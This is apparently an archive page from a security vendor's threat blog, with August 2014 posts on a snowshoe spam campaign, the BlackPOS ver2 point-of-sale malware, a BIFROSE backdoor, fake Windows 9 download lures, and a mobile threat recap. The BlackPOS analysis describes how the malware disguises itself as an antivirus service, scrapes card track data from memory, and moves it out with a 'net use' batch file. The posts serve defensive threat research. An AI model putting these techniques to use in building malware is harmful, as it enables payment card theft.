Archive for August, 2014

We recently reported about a large spike of commercial spam that employed micro-sized salad words or random gibberish words found in the email body to bypass spam filters. The content of these messages varied from hair loss cures to car sales to retailer coupons. Most of the samples contained links to websites they themselves advertise.

Aside from the tactic used, this particular spam run is notable because its two primary sources are hosting services providers and newly-registered domains that were not previously associated with known or detected spam activity. Service providers are often considered trustworthy but it now seems that they are being openly abused by spammers.

New Spam Sources

Majority of the spam-sending IPs were sourced from a company associated with a Canadian hosting service provider. The remaining IP addresses belong to US-based providers.

Newly-registered domains were another noteworthy spam source. Spammers created these newly-born domains and wasted no time in using these new domains as the sender address and URL inside the mail body, as seen in the table below. They started spamming only minutes after registering the new domains. When unsuspecting users clicked these domains found in the email message, they are redirected to spam websites.

Spammers may have used new domains with no spam history because these may not arouse suspicion. Analysis from our engineers shows that all the domains were filed under the same registrar by one organization.

Figure 1. Time between domain registration and first known spamming activity

Figure 2 shows the peak spam volume associated with this campaign within a 24-hour period. Closer inspection reveals that the spam run was composed of multiple short burst of spamming activity, shown in Figure 3. Each burst came from one IP address, followed by another burst from another IP address, and so on. Such behavior is most likely an attempt to evade IP-based filtering solutions.

Figure 2. Peak spam volume within specific hours

Figure 3. Multiple IPs contribute to the spam runs

Based on our IP statistics, 85% of the affected victims came from the US. Other top affected countries include Germany, Canada, Great Britain, and New Zealand.

Countermeasures

As spam techniques continue to adapt and evolve, users are advised to be on guard when opening their emails. Never open messages, download attachments and click links from unknown senders. Security solutions, such as spam filtering, can help protect users from such threats.

We recently spotted a brand new BlackPOS (point-of-sale) malware detected by Trend Micro as TSPY_MEMLOG.A. In 2012, the source code of BlackPOS was leaked, enabling other cybercriminals and attackers to enhance its code. What’s interesting about TSPY_MEMLOG.A is it disguises itself as an installed service of known AV vendor software to avoid being detected and consequently, deleted in the infected PoS systems. This routine is different from previous PoS malware such as TSPY_POCARDL.U and TSPY_POCARDL.AB (BlackPOS) that employed the targeted company’s own installed service.

The malware can be run with options: -[start|stop|install|uninstall]. The –install option installs the malware with service name =<AV_Company> Framework Management Instrumentation, and the –uninstall option deletes the said service. The RAM scraping routine begins as a thread when the installed service starts. It may only start its main routine if it has successfully been registered as a service.

Apart from masquerading itself as an AV software service, another new tactic of TSPY_MEMLOG.A is its updated process iteration function. It uses CreateToolhelp32Snapshot API call to list and iterate all running processes. BlackPOS variants typically use the EnumProcesses API call to list and iterate over the processes.

It drops and opens a component t.bat after it has read and matched the track data. This track data is where the information necessary to carry out card transactions is located; on the card this is stored either on the magnetic stripe or embedded chip.

The data will eventually get written out to a file called McTrayErrorLogging.dll. This is similar to what happened in the PoS malware attack involving the retail store, Target last December 2013.

Figure 1. CreateToolhelp32Snapshot to enumerate processes

Based on our analysis, this PoS malware uses a new custom search routine to check the RAM for Track data. These custom search routines have replaced the regex search in newer PoS malware. It samples 0x20000h bytes [the 0x and h implies hex bytes] in each pass, and continues scanning till it has scanned the entire memory region of the process being inspected.

Figure 2. Screenshot of reading process memory

Figure 3. Logging of data

It has an exclusion list that functions to ignore certain processes where track data is not found. It gathers track data by scanning the memory of the all running processes except for the following:

smss.exe

csrss.exe

wininit.exe

services.exe

lsass.exe

svchost.exe

winlogon.exe

sched.exe

spoolsv.exe

System

conhost.exe

ctfmon.exe

wmiprvse.exe

mdm.exe

taskmgr.exe

explorer.exe

RegSrvc.exe

firefox.exe

chrome.exe

This skipping of scanning specific processes is similar to VSkimmer (detected as BKDR_HESETOX.CC).

In TSPY_MEMLOG.A, the grabbed credit card Track data from memory is saved into a file McTrayErrorLogging.dll and sent to a shared location within the same network. We’ve seen this routine with another BlackPOS/Kaptoxa detected as TSPY_POCARDL.AB. However, the only difference is that TSPY_MEMLOG.A uses a batch file for moving the gathered data within the shared network while TSPY_POCARDL.AB executes the net command via cmd.exe. It is highly possible that the server is compromised since the malware uses a specific username for logging into the domain.

Data Exfiltration Mechanism

The malware drops the component t.bat which is responsible for transferring the data from McTrayErrorLogging.dll to a specific location in the network, t:\temp\dotnet\NDP45-KB2737084-x86.exe. It uses the following command to transfer the gathered data:

Figure 4. Screenshot of command used to transfer data

The “net use” command was used to connect from one machine to another machine’s drive. It uses a specific username to login to the domain above (IP address). It will open device t: on 10.44.2.153 drive D.

In one the biggest data breach we’ve seen in 2013, the cybercriminals behind it, offloaded the gathered data to a compromised server first while a different malware running on the compromised server uploaded it to the FTP. We surmise that this new BlackPOS malware uses the same exfiltration tactic.

Countermeasures

PoS malware can possibly arrive on the affected network via the following means:

Targeting specific servers by point of entry and lateral movement

Hacking network communication

Infect machine before deployment

As such, we recommend enterprises and large organizations implement a multi-layered security solution to ensure that their network is protected against vulnerabilities existing in systems and applications as this may be used to infiltrate the network. In addition, check also when a system component has been modified or changed as criminals are using known in-house software applications to hide their tracks. IT administrators can use the information on malware routines and indicators of compromise (IoCs) here to determine if their network has been compromised already by this new BlackPOS malware. For more information on PoS malware, read our white paper, Point-of-Sale System Breaches: Threats to the Retail and Hospitality Industries.

During the course of our investigation, we spotted the following anti-American messages embedded in the binary:

Figure 5. Screenshot of the messages embedded in the binary

(Click image above to enlarge)

Note that these are not used anywhere in the code and we surmise that these may be like a signature used by the group developing this malware.

Update as of 2:27 PM, September 11, 2014

Even though BlackPOS ver2 has an entirely different code compared to the BlackPOS which compromised Target, it duplicates the data exfiltration technique used by the Target BlackPOS. It is an improved clone of the original, which is why we decided to call this BlackPOS ver2.

It is also being reported in the press that some security vendors called this malware as “FrameworkPOS.” This is a play of the service name <AV_Company> Framework Management Instrumentation with which the malware installs itself.

Posted in Malware | Comments Off on New BlackPOS Malware Emerges in the Wild, Targets Retail Accounts

We recently investigated a targeted attack against a device manufacturer, and in our analysis, we found that the malware deployed into the target network is a variant of a well-known backdoor, BIFROSE. BIFROSE has been around for many years now, highly available in the cybercriminal underground, and has been used for various cybercriminal activities.

One of the past incidents we saw use BIFROSE was the “Here you have” spam campaign from 2010. The attack targeted human resource (HR) personnel of government offices such as the African Union and the NATO. The incident is quite comparable to what we know now as targeted attacks or APTs, which makes it unsurprising that it is now being used for such.

The BIFROSE variant (detected as BKDR_BIFROSE.ZTBG-A and has the hash 5e2844b20715d0806bfa28bd0ebcba6cbb637ea1) used against the device manufacturer is able to do the following information stealing routines:

Download a file

Upload a file

Get file details (file size, last modified time)

Create a folder

Delete a folder

Open a file using ShellExecute

Execute a command line

Rename a file

Enumerate all windows and their process IDs

Close a window

Move a window to the foreground

Hide a window

Send keystrokes to a window

Send mouse events to a window

Terminate a process

Get display resolution

Upload contents of %Windows%\winieupdates\klog.dat

Capture screenshot or webcam image

Figure 1. BIFROSE administrator panel

Figure 2. BIFROSE taking a screenshot of an affected system

BIFROSE is mostly known for its keylogging routines, but it is capable of stealing far more information than just keystrokes. It can also send keystrokes and mouse events to windows, which means that the attacker may be able to conduct operations as the affected user without having to compromise their accounts. For example, the attacker can log into internal systems or even send messages to other users in the network. What makes this variant more elusive is its ability of Tor to communicate with its C&C.

Can This Be Traced?

Apart from detecting the malware itself through a security solution, IT administrators may be able to check for the existence of a BIFROSE variant in the network. One of the easiest is checking for the existence of the file klog.dat in systems — a file associated with the keylogging routines.

Lastly, having a solution that is equipped to detect possibly malicious activity will help IT admins be able to determine the existence of an attack. For example, since this variant uses Tor in communicating with its C&C server, being able to detect Tor activity within a network will help identify potential attacks within the network, among others.

The file (VideoPerformanceSetup.exe) is an adware detected as ADW_BRANTALL.GA. Upon further analysis, the 5.11 GB file instead downloads a reskinned Windows 7 SP1 64-bit bundled with a handful of software utilities, rather than a ‘leaked’ copy of Windows 9. The default language setting for the installation is Portuguese (Brazil).

More Threats Leveraging the Windows 9 Hype

We found two more threats capitalizing on the Windows 9 hype. The first is similar to the one above – another blog offering a free download of Windows 9 behind a file hosting service link. That’s where the similarity ends however, as the downloaded file is a completely different one – one detected as ADW_INSTALLREX.GA. When executed, this adware downloads files detected as ADW_WAJADH, ADW_SPROTECT, and ADW_MULTIPLUG respectively.

Figure 4. Blog page offering free Windows 9 download

We also found a YouTube video page with the download link provided in the video’s description. Clicking the link in the description downloads two files – one labeled as Keygen.exe and the other as Setup.exe. Both are detected by Trend Micro as ADW_OUTBROWSE.GA

Figure 5. YouTube page offering free Windows 9 download

The download links in both abovementioned cases are verified to be grayware.

Other threats that we’ve spotted at the time of this writing involve blogs with similar content, but instead of grayware, their payloads mostly involve redirecting to phishing scams that go after the user’s mobile phone number.

This influx of threats taking advantage of Windows 9’s rumored developer preview release date further proves what we’ve been saying all along: that cybercriminals will always use what is currently popular to bait their potential victims. We’ve seen this kind of cybercriminal activity come up again and again with similar events, so it’s safe to assume that the amount of threats using Windows 9 as a lure will continue to increase as time goes on. The fact that it’s not even the official release – it’s just a preview – shows just how much cybercriminals are intent on cashing in on the hype. We may see even more after the release of the actual retail code itself, with malware posing as ‘cracked’ or ‘free’ versions.

The first half of this year has been quite eventful for the mobile threat landscape. Sure, we had an idea the state of affairs from 2013 would continue on to this year, but we didn’t know just to what extent. From ballooning mobile malware/high risk app numbers to vulnerabilities upon vulnerabilities, let’s recap just what happened in the past six months and see if we can learn anything from them for the six months ahead.

So, what did happen in the first half of 2014? Well, to summarize:

2 million and counting: After only six months of reaching 1 million, the combined amount of mobile malware/high risk apps has doubled, to 2 million. That’s a growth of 170,000 apps PER month.

The first coin mining mobile malware: ANDROIDOS_KAGECOIN, a malicious app that turned any infected mobile device into a Bitcoin/Dogecoin/Litecoin miner was discovered in March.

The first mobile ransomware: ANDROIDOS_LOCKER locked phones by way of obstructing screens with a large UI window. It was discovered in May.

Deep Web: Cybercriminals also began to use TOR in their malicious apps, to cover their trails.

A handful of major vulnerabilities were also discovered during this half of 2014, ranging from the Android Custom Permission vulnerability to the iOS Goto Fail vulnerability. Platform-agnostic vulnerability Heartbleed also made the news, affecting not just desktops but basically any platform that could connect to the web and load HTTP:// websites.

Hugely-popular events were also taken advantage of by cybercriminals through social engineering – the 2014 FIFA World Cup, for example, heralded the coming of fake game apps sporting the event’s name, with each one sporting malicious routines. Flappy Bird, the addictive game that had the entire mobile gaming scene taking attention, also garnered its own share of malicious clones.

That’s the first half of 2014 in a nutshell, with the most noteworthy events encapsulated. Can we learn anything from them in time to prepare for the next six months? Yes, of course – one lesson we can easily derive here is that we can always expect cybercriminals to take advantage of legitimate services that help make our lives more convenient online – and sometimes, they use it in ways we’ll never expect them to. So we need to look at new services coming out and, after seeing if they CAN be used maliciously, prepare for that inevitability. It helps to be prepared, after all.

Another lesson for the second half of 2014 is that people need to take mobile threats much more seriously. It’s no longer just a passing fad or something we can just forget about – it’s here, it’s happening, and like social engineering it’s going to be a part of our lives until the next breakthrough in technology comes along. Users, business owners, professionals need to protect themselves from becoming a victim – and all it takes are some best practices and a security solution.

For more information regarding the mobile threat landscape and how it fared in the first half of 2014, we’d like to point readers towards the latest issue of our Monthly Mobile Report, titled The Mobile Landscape Roundup: 1H 2014. You’ll see the events summarized above, but in more detail, along with other news events and definitely a lot more stats.